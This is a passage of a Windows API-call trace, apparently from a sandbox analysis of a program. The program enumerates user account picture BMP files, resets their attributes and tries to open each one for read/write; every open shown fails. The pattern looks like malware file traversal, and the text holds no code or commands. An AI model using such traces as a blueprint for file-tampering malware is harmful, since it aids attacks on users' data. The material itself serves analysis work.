SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", dwFileAttributes=0x80) returned 0 [0159.612] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.612] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.612] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.612] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.612] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.612] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", dwFileAttributes=0x80) returned 0 [0159.612] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.612] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.612] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.613] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.613] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.613] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", dwFileAttributes=0x80) returned 0 [0159.613] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.613] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.613] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.613] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.613] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.613] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", dwFileAttributes=0x80) returned 0 [0159.613] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.614] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.614] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.614] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.614] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.614] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", dwFileAttributes=0x80) returned 0 [0159.614] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.614] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.614] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.614] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.614] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.614] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", dwFileAttributes=0x80) returned 0 [0159.615] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.615] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.615] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.615] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.615] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.615] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", dwFileAttributes=0x80) returned 0 [0159.615] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.615] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.615] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.615] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.615] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.616] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", dwFileAttributes=0x80) returned 0 [0159.616] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.616] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.616] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.616] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.616] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.616] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", dwFileAttributes=0x80) returned 0 [0159.617] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.617] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.617] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.617] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.617] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.617] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", dwFileAttributes=0x80) returned 0 [0159.617] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.618] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.618] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.618] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.618] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.618] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", dwFileAttributes=0x80) returned 0 [0159.618] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.618] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.618] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.618] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.619] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.619] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", dwFileAttributes=0x80) returned 0 [0159.619] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.619] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.619] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.619] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.619] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.619] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", dwFileAttributes=0x80) returned 0 [0159.619] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.620] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.620] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.620] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.620] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.620] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", dwFileAttributes=0x80) returned 0 [0159.620] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.620] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.620] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.620] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.620] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.620] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", dwFileAttributes=0x80) returned 0 [0159.621] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.621] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.621] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.621] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.621] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.621] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", dwFileAttributes=0x80) returned 0 [0159.621] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.621] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.621] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.621] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.621] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.622] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", dwFileAttributes=0x80) returned 0 [0159.622] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.622] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.622] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.622] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.622] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", dwFileAttributes=0x80) returned 0 [0159.622] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.623] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.623] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.623] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.623] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", dwFileAttributes=0x80) returned 0 [0159.623] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.623] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.623] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.623] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.624] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", dwFileAttributes=0x80) returned 0 [0159.624] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.624] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.624] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.624] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.624] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.624] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", dwFileAttributes=0x80) returned 0 [0159.624] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.624] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.624] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.625] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.625] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.625] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", dwFileAttributes=0x80) returned 0 [0159.625] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.625] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.625] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.625] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.625] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.626] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", dwFileAttributes=0x80) returned 0 [0159.626] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.626] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.626] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.626] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.626] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", dwFileAttributes=0x80) returned 0 [0159.626] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.626] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.626] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.627] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.627] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", dwFileAttributes=0x80) returned 0 [0159.627] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.627] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.627] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.627] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.627] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.627] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", dwFileAttributes=0x80) returned 0 [0159.628] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.628] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.628] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.628] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", dwFileAttributes=0x80) returned 0 [0159.628] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.628] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.628] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.628] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.628] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.629] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", dwFileAttributes=0x80) returned 0 [0159.629] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.629] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.629] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.629] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.629] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.629] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", dwFileAttributes=0x80) returned 0 [0159.629] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.630] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.630] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.630] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.630] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.630] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", 